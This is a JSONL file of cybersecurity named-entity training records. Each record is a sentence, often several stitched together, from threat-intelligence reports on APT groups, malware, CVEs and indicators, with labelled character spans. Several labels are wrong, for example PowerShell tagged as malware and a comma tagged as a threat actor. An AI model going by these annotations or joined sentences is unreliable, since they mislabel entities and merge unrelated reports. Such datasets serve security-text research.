{"text": "With a bit of luck , we managed to find logs in which the evidence showed “ Agent Smith ’ s C & C front end routinely distributes a workload between “ w.h * * * g.com ” and “ tt.a * * * d.net ” . This activity is a longer tail for the actor than a spearphish ; this is likely based on the Clever Kitten background , which may be focused on web development/application testing . Using msiexec.exe , a legitimate system process , can make it harder to trace the source of malicious activity . FireEye currently tracks this activity in three clusters , UNC2639 , UNC2640 , and UNC2643 .", "spans": {"MALWARE: Agent Smith": [[76, 87]], "FILEPATH: msiexec.exe": [[384, 395]], "ORGANIZATION: FireEye": [[491, 498]], "THREAT_ACTOR: UNC2639": [[550, 557]], "THREAT_ACTOR: UNC2640": [[560, 567]], "THREAT_ACTOR: UNC2643": [[574, 581]]}, "info": {"id": "cyberner_stix_train_004275", "source": "cyberner_stix_train"}}
{"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . Contextually relevant emails are sent to specific targets with attached documents that are packed with exploit code and Trojan horse programmes designed to take advantage of vulnerabilities in software installed on the target 's computer .", "spans": {"ORGANIZATION: government officials": [[28, 48]], "MALWARE: malicious Microsoft Word document": [[90, 123]], "VULNERABILITY: CVE-2012-0158": [[143, 156]], "TOOL: emails": [[223, 229]], "FILEPATH: documents": [[273, 282]], "VULNERABILITY: exploit": [[304, 311]], "MALWARE: Trojan": [[321, 327]]}, "info": {"id": "cyberner_stix_train_004276", "source": "cyberner_stix_train"}}
{"text": "One curious trait of Bahamut is that it develops fully-functional applications in support of its espionage activities , rather than push nonfunctional fake apps or bundle malware with legitimate software . CTU researchers have evidence that the TG-3390 compromised U.S. and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations .", "spans": {"TOOL: legitimate software": [[184, 203]], "ORGANIZATION: CTU": [[206, 209]], "THREAT_ACTOR: TG-3390": [[245, 252]], "ORGANIZATION: manufacturing": [[320, 333]], "ORGANIZATION: aerospace": [[349, 358]], "ORGANIZATION: defense contractors": [[371, 390]], "ORGANIZATION: automotive": [[395, 405]], "ORGANIZATION: technology": [[408, 418]], "ORGANIZATION: energy": [[421, 427]], "ORGANIZATION: pharmaceuticals": [[434, 449]], "ORGANIZATION: education": [[454, 463]], "ORGANIZATION: legal": [[470, 475]]}, "info": {"id": "cyberner_stix_train_004277", "source": "cyberner_stix_train"}}
{"text": "Interestingly , that location may be either a web address or a Microsoft OneDrive account .", "spans": {"ORGANIZATION: Microsoft": [[63, 72]], "TOOL: OneDrive": [[73, 81]]}, "info": {"id": "cyberner_stix_train_004278", "source": "cyberner_stix_train"}}
{"text": "After its foray into overt and disruptive attacks in 2016 , the group has subsequently returned to its roots , mounting intelligence gathering operations against a range of targets .", "spans": {}, "info": {"id": "cyberner_stix_train_004279", "source": "cyberner_stix_train"}}
{"text": "If , for some reason , SuperService does not switch off the screen when there is an attempt to revoke the device administrator privileges , the Trojan tries to intimidate the user : While running , Rotexy tracks the following : switching on and rebooting of the phone ; termination of its operation – in this case , it relaunches ; sending of an SMS by the app – in this case , the phone is switched to silent mode . Analysts in our DeepSight Managed Adversary and Threat Intelligence ( MATI ) team have found a new backdoor , Backdoor.Powemuddy , new variants of Seedworm 's Powermud backdoor ( aka POWERSTATS ) , a GitHub repository used by the group to store their scripts , as well as several post-compromise tools the group uses to exploit victims once they have established a foothold in their network . The campaign 's use of an SMB worm to distribute WCry contributed to the ransomware 's virulence .", "spans": {"MALWARE: Rotexy": [[198, 204]], "ORGANIZATION: DeepSight Managed Adversary and Threat Intelligence": [[433, 484]], "ORGANIZATION: MATI": [[487, 491]], "MALWARE: Backdoor.Powemuddy": [[527, 545]], "THREAT_ACTOR: Seedworm": [[564, 572]], "MALWARE: Powermud backdoor": [[576, 593]], "TOOL: POWERSTATS": [[600, 610]], "THREAT_ACTOR: group": [[647, 652], [723, 728]], "MALWARE: SMB worm": [[836, 844]], "MALWARE: WCry": [[859, 863]]}, "info": {"id": "cyberner_stix_train_004280", "source": "cyberner_stix_train"}}
{"text": "There were several distinct areas where mobile malware underwent advances . LuckyMouse , also known as Iron Tiger , EmissaryPanda , APT 27 and Threat Group-3390 , is the same group of Chinese hackers who was found targeting Asian countries with Bitcoin mining malware early this year . We have contacted the compromised universities and provided the necessary information and assistance to remediate the compromise . Additional attacker backdoors identified on systems with names that masquaraded as legitimate binaries and also produced AOT files upon translation ( e.g. , npx - cli and npx-cli.aot ) .", "spans": {"THREAT_ACTOR: LuckyMouse": [[76, 86]], "THREAT_ACTOR: Iron Tiger": [[103, 113]], "THREAT_ACTOR: EmissaryPanda": [[116, 129]], "THREAT_ACTOR: APT 27": [[132, 138]], "THREAT_ACTOR: Threat Group-3390": [[143, 160]], "TOOL: Bitcoin mining malware": [[245, 267]], "THREAT_ACTOR: attacker backdoors": [[428, 446]]}, "info": {"id": "cyberner_stix_train_004281", "source": "cyberner_stix_train"}}
{"text": "Nevertheless , on May 12th 2015 ( a few weeks after the attack against Bundestag appears to have started ) the American security firm root9B released a report containing details on malware samples very similar to Artifact #2 .", "spans": {"ORGANIZATION: Bundestag": [[71, 80]]}, "info": {"id": "cyberner_stix_train_004282", "source": "cyberner_stix_train"}}
{"text": "The hackers will map a company’s network and look for strategically favorable locations for placing their malware . To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 .", "spans": {"THREAT_ACTOR: hackers": [[4, 11]], "MALWARE: Lamberts toolkit": [[185, 201]], "MALWARE: Black Lambert": [[218, 231]], "VULNERABILITY: zero day": [[268, 276]], "VULNERABILITY: exploit": [[277, 284]], "VULNERABILITY: CVE-2014-4148": [[287, 300]]}, "info": {"id": "cyberner_stix_train_004283", "source": "cyberner_stix_train"}}
{"text": "] databit [ . The first attack started in early July with a ShimRatReporter payload . The POST URI is changed to /bbs/ search.asp ( as mentioned , earlier Aumlib variants used a POST URI of /bbs/ info.asp . ) The POST body is now encoded . FireEye currently tracks this activity in three clusters , UNC2639 , UNC2640 , and UNC2643 .", "spans": {"MALWARE: ShimRatReporter": [[60, 75]], "FILEPATH: search.asp": [[119, 129]], "MALWARE: Aumlib": [[155, 161]], "FILEPATH: info.asp": [[196, 204]], "ORGANIZATION: FireEye": [[240, 247]], "THREAT_ACTOR: UNC2639": [[299, 306]], "THREAT_ACTOR: UNC2640": [[309, 316]], "THREAT_ACTOR: UNC2643": [[323, 330]]}, "info": {"id": "cyberner_stix_train_004284", "source": "cyberner_stix_train"}}
{"text": "In particular , EventBot can intercept SMS messages and bypass two-factor authentication mechanisms . The operation against the Tibetan Parliamentarians illustrates the continued use of malicious attachments in the form of documents bearing exploits . The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept ( POC ) code to install a Trojan called Emissary , which is related to the Operation Lotus Blossom campaign .", "spans": {"MALWARE: EventBot": [[16, 24]], "ORGANIZATION: Tibetan Parliamentarians": [[128, 152]], "MALWARE: malicious attachments": [[186, 207]], "TOOL: documents bearing exploits": [[223, 249]], "THREAT_ACTOR: actors": [[256, 262]], "VULNERABILITY: exploit": [[276, 283]], "VULNERABILITY: CVE-2014-6332": [[284, 297]], "MALWARE: Trojan": [[382, 388]], "MALWARE: Emissary": [[396, 404]]}, "info": {"id": "cyberner_stix_train_004285", "source": "cyberner_stix_train"}}
{"text": "Given that both organizations appear to describe similar ( if not identical ) activity , any reasonable person could ( and should ) ask – why the inconsistency in naming and identification? Aside from the competitive vendor naming landscape ( which I am not a fan of in cases on direct overlap , but which has more to say for itself when different methodologies are employed around similar observations ) , the distinction between FireEye and Dragos ’ approaches with respect to the “ TRITON actor ” comes down to fundamental philosophical differences in methodology .", "spans": {"ORGANIZATION: FireEye": [[431, 438]], "ORGANIZATION: Dragos": [[443, 449]], "MALWARE: TRITON": [[485, 491]]}, "info": {"id": "cyberner_stix_train_004286", "source": "cyberner_stix_train"}}
{"text": "The new IP addresses are typically on the same subnet as the previous ones .", "spans": {}, "info": {"id": "cyberner_stix_train_004287", "source": "cyberner_stix_train"}}
{"text": "Destructive malware used by VOODOO BEAR includes a wiper called PassKillDisk . Further tracking of the Lazarus’s activities has enabled Kaspersky researchers to discover a new operation , active since at least November 2018 , which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers .", "spans": {"THREAT_ACTOR: VOODOO BEAR": [[28, 39]], "TOOL: PassKillDisk": [[64, 76]], "THREAT_ACTOR: Lazarus’s": [[103, 112]], "ORGANIZATION: Kaspersky": [[136, 145]], "MALWARE: PowerShell": [[241, 251]], "SYSTEM: Windows": [[263, 270]], "ORGANIZATION: Apple customers": [[308, 323]]}, "info": {"id": "cyberner_stix_train_004288", "source": "cyberner_stix_train"}}
{"text": "Gooligan-infected apps can also be installed using phishing scams where attackers broadcast links to infected apps to unsuspecting users via SMS or other messaging services . Based on details published in the DOJ complaint against North Korean programmer Park Jin Hyok , we know that APT38 and other cyber operators linked to TEMP.Hermit are associated with Lab 110 , an organization subordinate to or synonymous with the 6th Technical Bureau in North Korea 's Reconnaissance General Bureau ( RGB ) . This results in The email would start a conversation between the attackers and victims sometimes being quite lengthy to establish trust , which would include the attackers encouraging the victim to open a registration link hosted by a real website that had already been compromised by the attackers .", "spans": {"MALWARE: Gooligan-infected": [[0, 17]], "THREAT_ACTOR: APT38": [[284, 289]], "THREAT_ACTOR: cyber operators": [[300, 315]], "THREAT_ACTOR: TEMP.Hermit": [[326, 337]], "ORGANIZATION: Lab 110": [[358, 365]], "THREAT_ACTOR: the attackers": [[659, 672]], "ORGANIZATION: victim": [[689, 695]]}, "info": {"id": "cyberner_stix_train_004289", "source": "cyberner_stix_train"}}
{"text": "First , they use the built-in toolbox commands to determine what apps are running . Group123 is constantly evolving as the new fileless capability that was added to ROKRAT demonstrates . Another obfuscation , This article is based on research by Marcelo Rivero , Malwarebytes ' ransomware specialist , who monitors information published by ransomware gangs on their Dark Web sites .", "spans": {"THREAT_ACTOR: Group123": [[84, 92]], "TOOL: ROKRAT": [[165, 171]], "ORGANIZATION: Marcelo Rivero": [[246, 260]], "ORGANIZATION: Malwarebytes ' ransomware specialist": [[263, 299]], "THREAT_ACTOR: ransomware gangs": [[340, 356]], "TOOL: Dark Web sites": [[366, 380]]}, "info": {"id": "cyberner_stix_train_004290", "source": "cyberner_stix_train"}}
{"text": "TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems . The samples Novetta obtained from the active Axiom infection were compiled in mid- to late 2014 and represent what Novetta is referring to as version 3.0 of the Winnti lineage .", "spans": {"ORGANIZATION: Novetta": [[139, 146], [242, 249]], "THREAT_ACTOR: Winnti": [[288, 294]]}, "info": {"id": "cyberner_stix_train_004291", "source": "cyberner_stix_train"}}
{"text": "On April 3 , 2016 , we still observed new RuMMS samples emerging in the wild . Data about Wingbird activity indicates that it is typically used to attack individuals and individual computers instead of networks . Hash : e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8 . While COSMICENERGY ’s capabilities are not significantly different from previous OT malware families ’ , its discovery highlights several notable developments in the OT threat landscape .", "spans": {"MALWARE: RuMMS": [[42, 47]], "FILEPATH: e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8": [[220, 284]], "MALWARE: COSMICENERGY ’s": [[293, 308]], "MALWARE: OT malware families": [[368, 387]]}, "info": {"id": "cyberner_stix_train_004292", "source": "cyberner_stix_train"}}
{"text": "Over a few days' span , the threat actors install remote access tools on additional systems based upon the results of the network reconnaissance .", "spans": {}, "info": {"id": "cyberner_stix_train_004293", "source": "cyberner_stix_train"}}
{"text": "The additions include code to decrypt an embedded Flash object and an event handler that calls a newly added function ( “ skinEvent2 ” ) that plays the decrypted object .", "spans": {"TOOL: Flash": [[50, 55]]}, "info": {"id": "cyberner_stix_train_004294", "source": "cyberner_stix_train"}}
{"text": "This very first step fails in Android 7.0 and higher , even with a root permission . The main point that sets Operation Groundbait apart from the other attacks is that it has mostly been targeting anti-government separatists in the self-declared Donetsk and Luhansk People's Republics . This BLACKCOFFEE variant contains one or more URLs that link to the biography sections of attacker-created profiles as well as forum threads that contain comments from those same profiles . This model is flexible and enables the operators to constantly change how their backdoors retrieve further commands or malcode as needed .", "spans": {"SYSTEM: Android 7.0": [[30, 41]], "ORGANIZATION: anti-government separatists": [[197, 224]], "MALWARE: BLACKCOFFEE": [[292, 303]]}, "info": {"id": "cyberner_stix_train_004295", "source": "cyberner_stix_train"}}
{"text": "] orgmary-crawley [ . We named it RedOctober because we started this investigation in October 2012 , an unusually hot month . Typical use of HTRAN is fairly simple : the attacker must specify the originating IP address ( of his or her workstation in Shanghai ) , and a port on which to accept connections . This makes Greatness particularly well - suited for phishing business users .", "spans": {"TOOL: HTRAN": [[141, 146]], "THREAT_ACTOR: phishing business users": [[359, 382]]}, "info": {"id": "cyberner_stix_train_004296", "source": "cyberner_stix_train"}}
{"text": "App Swap Per Device Avg . One of its file stealers , swissknife2 , abuses a cloud storage service as a repository of exfiltrated files . Many of the URLs listed were in use for an extended period . The file , matches signatures for the tried - and - true China Chopper .", "spans": {"TOOL: swissknife2": [[53, 64]], "THREAT_ACTOR: the tried - and - true China Chopper": [[232, 268]]}, "info": {"id": "cyberner_stix_train_004297", "source": "cyberner_stix_train"}}
{"text": "Technical Analysis XLoader first loads the encrypted payload from Assets/db as test.dex to drop the necessary modules then requests for device administrator privileges . At least 4 attack campaigns against Pakistan have been observed by us since 2017 . Then it invokes the renamed executable and runs it passing a series of parameter : “ uninstall.exe x -pQELRatcwbU2EJ5 -y ”", "spans": {"MALWARE: XLoader": [[19, 26]], "FILEPATH: uninstall.exe": [[338, 351]]}, "info": {"id": "cyberner_stix_train_004298", "source": "cyberner_stix_train"}}
{"text": "? After the phishing email resulted in a successful infiltration , ITG08 used the More_eggs backdoor to gain a foothold and infect additional devices . We consider APT38 's operations more global and highly specialized for targeting the financial sector .", "spans": {"THREAT_ACTOR: ITG08": [[67, 72]], "TOOL: More_eggs backdoor": [[82, 100]], "THREAT_ACTOR: APT38": [[164, 169]], "ORGANIZATION: financial sector": [[237, 253]]}, "info": {"id": "cyberner_stix_train_004299", "source": "cyberner_stix_train"}}
{"text": "Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . One vulnerability is a Windows zero-day vulnerability ( CVE-2019-0703 ) discovered by Symantec . Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers .", "spans": {"THREAT_ACTOR: Patchwork": [[9, 18]], "MALWARE: RTF files": [[45, 54]], "VULNERABILITY: CVE-2017-8570": [[66, 79]], "SYSTEM: Windows": [[105, 112], [201, 208]], "VULNERABILITY: zero-day": [[113, 121]], "VULNERABILITY: CVE-2019-0703": [[138, 151]], "ORGANIZATION: Symantec": [[168, 176]], "THREAT_ACTOR: Bemstour": [[179, 187]], "VULNERABILITY: vulnerabilities": [[209, 224]]}, "info": {"id": "cyberner_stix_train_004300", "source": "cyberner_stix_train"}}
{"text": "Incident Background Beginning on Oct. 24 at 08:00 UTC , FireEye detected and blocked attempts to infect multiple clients with a drive-by download masquerading as a Flash Update (install_flash_player.exe) that delivered a wormable variant of ransomware . The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": {"ORGANIZATION: FireEye": [[56, 63]], "MALWARE: (install_flash_player.exe)": [[177, 203]], "MALWARE: ransomware": [[241, 251]], "THREAT_ACTOR: BlackOasis": [[314, 324]], "ORGANIZATION: Kaspersky": [[327, 336]], "TOOL: Adobe Flash Player": [[370, 388]], "VULNERABILITY: zero-day": [[389, 397]], "VULNERABILITY: CVE-2016-4117": [[414, 427]], "MALWARE: FinSpy": [[474, 480]]}, "info": {"id": "cyberner_stix_train_004301", "source": "cyberner_stix_train"}}
{"text": "However , this time , the permission is actually used . security policy in the Eastern Europe and South Caucasus regions . Attached to this email was a malicious Microsoft Word document ( MD5: f6fafb7c30b1114befc93f39d0698560 ) that exploited CVE-2012-0158 . TEMP.Veles has used port - protocol mismatches on ports such as 443 , 4444 , 8531 , and 50501 during C2 .", "spans": {"TOOL: email": [[140, 145]], "ORGANIZATION: Microsoft": [[162, 171]], "TOOL: Word": [[172, 176]], "FILEPATH: f6fafb7c30b1114befc93f39d0698560": [[193, 225]], "VULNERABILITY: CVE-2012-0158": [[243, 256]], "MALWARE: TEMP.Veles": [[259, 269]], "SYSTEM: C2": [[360, 362]]}, "info": {"id": "cyberner_stix_train_004302", "source": "cyberner_stix_train"}}
{"text": "It turns out that contacts data isn’t the only unusual data SWAnalytics is interested in . This function is similar to the various versions of backdoors ( such as sctrls and sip_telephone ) that we analyzed in our previous blog post and whitepaper .", "spans": {"MALWARE: SWAnalytics": [[60, 71]], "MALWARE: sctrls": [[163, 169]], "MALWARE: sip_telephone": [[174, 187]]}, "info": {"id": "cyberner_stix_train_004303", "source": "cyberner_stix_train"}}
{"text": "An investigation of Chrysaor Malware on Android 03 April 2017 Google is constantly working to improve our systems that protect users from Potentially Harmful Applications ( PHAs ) . During our investigation , there was a breakthrough discovery that helped connect Leafminer to a number of attacks observed on systems in the Middle East and identify the toolkit used in the group 's efforts of intrusion , lateral movement , and exfiltration . APT33 : 192.119.15.35 [REDACTED].ddns.net . As such , we ’ve seen a growing number of reports of victims who are targeted with commercial spyware .", "spans": {"MALWARE: Chrysaor": [[20, 28]], "SYSTEM: Android": [[40, 47]], "ORGANIZATION: Google": [[62, 68]], "THREAT_ACTOR: Leafminer": [[264, 273]], "THREAT_ACTOR: group": [[373, 378]], "THREAT_ACTOR: APT33": [[443, 448]], "IP_ADDRESS: 192.119.15.35": [[451, 464]], "DOMAIN: [REDACTED].ddns.net": [[465, 484]]}, "info": {"id": "cyberner_stix_train_004304", "source": "cyberner_stix_train"}}
{"text": "However , the group ’s activities since the beginning of 2017 have again become more covert and appear to be mainly motivated by intelligence gathering .", "spans": {}, "info": {"id": "cyberner_stix_train_004305", "source": "cyberner_stix_train"}}
{"text": "TrickMo is no different ; the goal is to complete the operation while raising minimal suspicion . Since they were first identified in January 2-16 , this adversary has consistently targeted large organizations for high ransom demands . Strider has been active since at least October 2011 .", "spans": {"MALWARE: TrickMo": [[0, 7]], "THREAT_ACTOR: Strider": [[236, 243]]}, "info": {"id": "cyberner_stix_train_004306", "source": "cyberner_stix_train"}}
{"text": "Targets of the campaign received Microsoft Word documents via email that claimed to contain instructions for logging into webmail or information regarding a state law proposal .", "spans": {"TOOL: Microsoft Word documents": [[33, 57]], "TOOL: email": [[62, 67]], "TOOL: webmail": [[122, 129]]}, "info": {"id": "cyberner_stix_train_004307", "source": "cyberner_stix_train"}}
{"text": "In 2015 and 2016 , Dridex was one of the most prolific eCrime banking trojans on the market and , since 2014 , those efforts are thought to have netted INDRIK SPIDER millions of dollars in criminal profits . According to 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor .", "spans": {"TOOL: Dridex": [[19, 25]], "ORGANIZATION: banking": [[62, 69]], "THREAT_ACTOR: INDRIK SPIDER": [[152, 165]], "ORGANIZATION: 360 Threat Intelligence Center": [[221, 251]], "MALWARE: njRAT backdoor": [[300, 314]]}, "info": {"id": "cyberner_stix_train_004308", "source": "cyberner_stix_train"}}
{"text": "Accessibility features are typically used to help users with disabilities by giving the device the ability to write into input fields , auto-generate permissions , perform gestures for the user , etc . Today , this malware is still actively being used against the Philippines . M-Trends 2018 can arm security teams with the knowledge they need to defend against today 's most often used cyber attacks , as well as lesser seen and emerging threats .", "spans": {"MALWARE: malware": [[215, 222]], "ORGANIZATION: M-Trends": [[278, 286]]}, "info": {"id": "cyberner_stix_train_004309", "source": "cyberner_stix_train"}}
{"text": "On the 14th of November , F-Secure published a blog post naming the malware OnionDuke and associating it with MiniDuke and CosmicDuke , the other Duke toolsets known at the time .", "spans": {"ORGANIZATION: F-Secure": [[26, 34]], "MALWARE: OnionDuke": [[76, 85]], "MALWARE: MiniDuke": [[110, 118]], "MALWARE: CosmicDuke": [[123, 133]], "THREAT_ACTOR: Duke": [[146, 150]]}, "info": {"id": "cyberner_stix_train_004310", "source": "cyberner_stix_train"}}
{"text": "Information about the C&C infrastructure identified in our analysis of Suckfly activity can be seen in Table 1 .", "spans": {"TOOL: C&C": [[22, 25]], "THREAT_ACTOR: Suckfly": [[71, 78]]}, "info": {"id": "cyberner_stix_train_004311", "source": "cyberner_stix_train"}}
{"text": "Finally , the malware spawns a thread that has the goal to load , remap , and relocate the stage 5 malware . Mandiant has previously observed targeted attackers stealing email , but few threat actors have been as successful at this as APT35 . While this loader differs somewhat in general implementation , the payload extraction routine seems to be the same as in the previous variant . In this incident , the attacker leveraged an EOL version of the MicroSCADA supervisory control system .", "spans": {"ORGANIZATION: Mandiant": [[109, 117]], "THREAT_ACTOR: attackers": [[151, 160]], "THREAT_ACTOR: threat actors": [[186, 199]], "THREAT_ACTOR: APT35": [[235, 240]], "SYSTEM: EOL": [[432, 435]], "SYSTEM: MicroSCADA": [[451, 461]]}, "info": {"id": "cyberner_stix_train_004312", "source": "cyberner_stix_train"}}
{"text": "Analysis of a threat group's targeting , origin , and competencies can determine which organizations could be at risk .", "spans": {}, "info": {"id": "cyberner_stix_train_004313", "source": "cyberner_stix_train"}}
{"text": "Subsequently , two additional articles ( here and here ) were released by Objective-See which provide an analysis of some validated WINDSHIFT samples targeting OSX systems . APT28 is using novel techniques involving the EternalBlue exploits and the open source tool Responder to spread laterally through networks and likely target travelers .", "spans": {"ORGANIZATION: Objective-See": [[74, 87]], "TOOL: WINDSHIFT samples": [[132, 149]], "THREAT_ACTOR: APT28": [[174, 179]], "VULNERABILITY: EternalBlue": [[220, 231]], "VULNERABILITY: exploits": [[232, 240]], "MALWARE: open source tool": [[249, 265]], "MALWARE: Responder": [[266, 275]]}, "info": {"id": "cyberner_stix_train_004314", "source": "cyberner_stix_train"}}
{"text": "FAKE REVIEWS When early versions of apps are first published , many five star reviews appear with comments like : “ So .. good .. ” “ very beautiful ” Later , 1 star reviews from real users start appearing with comments like : “ Deception ” “ The app is not honest … ” SUMMARY Sheer volume appears to be the preferred approach for Bread developers . Researchers from various security organizations have used a variety of names to assign responsibility for the hacks , including LEAD , BARIUM , Wicked Panda , GREF , PassCV , Axiom , and Winnti . In versions 3.1 – 3.21, the configuration info is xor encoded with 0x85 . Most fraudsters create one - time email addresses or use stolen email addresses , both of which are easy to create or obtain .", "spans": {"MALWARE: Bread": [[331, 336]], "THREAT_ACTOR: LEAD": [[478, 482]], "THREAT_ACTOR: BARIUM": [[485, 491]], "THREAT_ACTOR: Wicked Panda": [[494, 506]], "THREAT_ACTOR: GREF": [[509, 513]], "THREAT_ACTOR: PassCV": [[516, 522]], "THREAT_ACTOR: Axiom": [[525, 530]], "THREAT_ACTOR: Winnti": [[537, 543]], "THREAT_ACTOR: fraudsters": [[625, 635]]}, "info": {"id": "cyberner_stix_train_004315", "source": "cyberner_stix_train"}}
{"text": "In 2014 , our colleagues at Crowdstrike wrote an expos about a long-standing Chinese APT threat group they self-named Putter Panda , which Mandiant / FireEye refers to as APT2 . China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool .", "spans": {"ORGANIZATION: Crowdstrike": [[28, 39]], "THREAT_ACTOR: APT threat group": [[85, 101]], "THREAT_ACTOR: Putter Panda": [[118, 130]], "ORGANIZATION: Mandiant": [[139, 147]], "ORGANIZATION: FireEye": [[150, 157]], "THREAT_ACTOR: APT2": [[171, 175]], "FILEPATH: China Chopper": [[178, 191]], "THREAT_ACTOR: attackers": [[214, 223]]}, "info": {"id": "cyberner_stix_train_004316", "source": "cyberner_stix_train"}}
{"text": "Unlike newer samples , this one created a unique file sloo.exe .", "spans": {"FILEPATH: sloo.exe": [[54, 62]]}, "info": {"id": "cyberner_stix_train_004317", "source": "cyberner_stix_train"}}
{"text": "Unlike other rooting malware , this Trojan not only installs its modules into the system , it also injects malicious code into the system runtime libraries . In addition to the legitimate AmmyAdmin tool , the hackers used Visconti Backdoor developed based on legitimate RMS ( remote manipulator system ) software . The macro code inside the remote OLE document contains PowerShell commands that download and execute the final payload . ( Forbes , Gizmodo ) • Vulnerability Roundup : Memory corruption vulnerability in Microsoft Edge ; MilesightVPN and router could be taken over • Malicious Microsoft Drivers Could Number in the Thousands : Cisco Talos • New Threat Actor Launches Cyber - attacks on Ukraine and Poland •", "spans": {"TOOL: AmmyAdmin tool": [[188, 202]], "TOOL: Visconti Backdoor": [[222, 239]], "TOOL: RMS": [[270, 273]], "TOOL: OLE": [[348, 351]], "TOOL: PowerShell": [[370, 380]], "ORGANIZATION: Forbes": [[438, 444]], "ORGANIZATION: Gizmodo": [[447, 454]], "VULNERABILITY: Memory corruption vulnerability": [[483, 514]], "TOOL: Microsoft Edge": [[518, 532]], "SYSTEM: MilesightVPN": [[535, 547]], "TOOL: Malicious Microsoft Drivers": [[581, 608]], "ORGANIZATION: Cisco Talos": [[641, 652]], "THREAT_ACTOR: Cyber - attacks": [[681, 696]]}, "info": {"id": "cyberner_stix_train_004318", "source": "cyberner_stix_train"}}
{"text": "The first webview overlay is created on step 6 of the activation cycle . We attribute this activity to TEMP.Zagros ( reported by Palo Alto Networks and Trend Micro ) , an Iran-nexus actor that has been active since at least May 2017 . The newer sample appears to be a re-write for optimization purposes with the underlying behavior remaining the same , reverse shell . First , the endpoint , used for informing clients about services offered by the remote Microsoft Exchange server , is accessed using an authenticated request to the frontend .", "spans": {"THREAT_ACTOR: TEMP.Zagros": [[103, 114]], "ORGANIZATION: Palo Alto Networks": [[129, 147]], "ORGANIZATION: Trend Micro": [[152, 163]], "THREAT_ACTOR: actor": [[182, 187]], "TOOL: reverse shell": [[353, 366]]}, "info": {"id": "cyberner_stix_train_004319", "source": "cyberner_stix_train"}}
{"text": "The collection of basic device information . The generalized targeting of organizations involved in energy and petrochemicals mirrors previously observed targeting by other suspected Iranian threat groups , indicating a common interest in the sectors across Iranian actors . The newest module’s compilation timestamp is March 2018 . Budworm aka LuckyMouse , Emissary Panda , APT27 deployed a previously unseen variant of its SysUpdate backdoor SysUpdate DLL inicore_v2.3.30.dll .", "spans": {"ORGANIZATION: energy": [[100, 106]], "ORGANIZATION: petrochemicals": [[111, 125]], "THREAT_ACTOR: threat groups": [[191, 204]], "THREAT_ACTOR: actors": [[266, 272]], "THREAT_ACTOR: Budworm": [[333, 340]], "THREAT_ACTOR: LuckyMouse": [[345, 355]], "THREAT_ACTOR: Emissary Panda": [[358, 372]], "THREAT_ACTOR: ,": [[373, 374]], "MALWARE: SysUpdate backdoor SysUpdate DLL inicore_v2.3.30.dll": [[425, 477]]}, "info": {"id": "cyberner_stix_train_004320", "source": "cyberner_stix_train"}}
{"text": "The ultimate objective of targeted attacks is to acquire sensitive data . XENOTIME operates globally , impacting regions far outside of the Middle East , their initial target .", "spans": {"THREAT_ACTOR: XENOTIME": [[74, 82]]}, "info": {"id": "cyberner_stix_train_004321", "source": "cyberner_stix_train"}}
{"text": "Copy the content from the server object into the new client object ( will not work if client implementation is different ) .", "spans": {}, "info": {"id": "cyberner_stix_train_004322", "source": "cyberner_stix_train"}}
{"text": "In this same time frame , APT10 also targeted a U.S. law firm and an international apparel company , likely to gather information for commercial advantage . This technique hides the true C2 server from researchers that do not have access to both the rastls.dll and Sycmentec.config files .", "spans": {"THREAT_ACTOR: APT10": [[26, 31]], "ORGANIZATION: U.S. law firm": [[48, 61]], "ORGANIZATION: apparel company": [[83, 98]], "TOOL: C2": [[187, 189]], "FILEPATH: rastls.dll": [[250, 260]], "FILEPATH: Sycmentec.config files": [[265, 287]]}, "info": {"id": "cyberner_stix_train_004323", "source": "cyberner_stix_train"}}
{"text": "Screenshots from this developer ’ s YouTube video shows history of checking Ashas adware on Google Play ESET telemetry Figure 15 . The regsvr32.exe executable can be used to download a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument . The exploit , which takes advantage of CVE-2018-4878 , allows an attacker to execute arbitrary code such as an implant .", "spans": {"SYSTEM: YouTube": [[36, 43]], "MALWARE: Ashas": [[76, 81]], "SYSTEM: Google Play": [[92, 103]], "ORGANIZATION: ESET": [[104, 108]], "MALWARE: regsvr32.exe": [[135, 147]], "MALWARE: SCT file": [[252, 260]], "VULNERABILITY: exploit": [[282, 289]], "VULNERABILITY: CVE-2018-4878": [[317, 330]], "THREAT_ACTOR: attacker": [[343, 351]]}, "info": {"id": "cyberner_stix_train_004324", "source": "cyberner_stix_train"}}
{"text": "The Root of All ( Android ) Evil So how does TrickMo get around these security features ? HawkEye is a versatile Trojan used by diverse actors for multiple purposes . In July 2017 , we observed the OilRig group using a tool they developed called ISMAgent in a new set of targeted attacks .", "spans": {"SYSTEM: Android": [[18, 25]], "MALWARE: TrickMo": [[45, 52]], "TOOL: HawkEye": [[90, 97]], "THREAT_ACTOR: actors": [[136, 142]], "THREAT_ACTOR: OilRig group": [[198, 210]], "MALWARE: ISMAgent": [[246, 254]]}, "info": {"id": "cyberner_stix_train_004325", "source": "cyberner_stix_train"}}
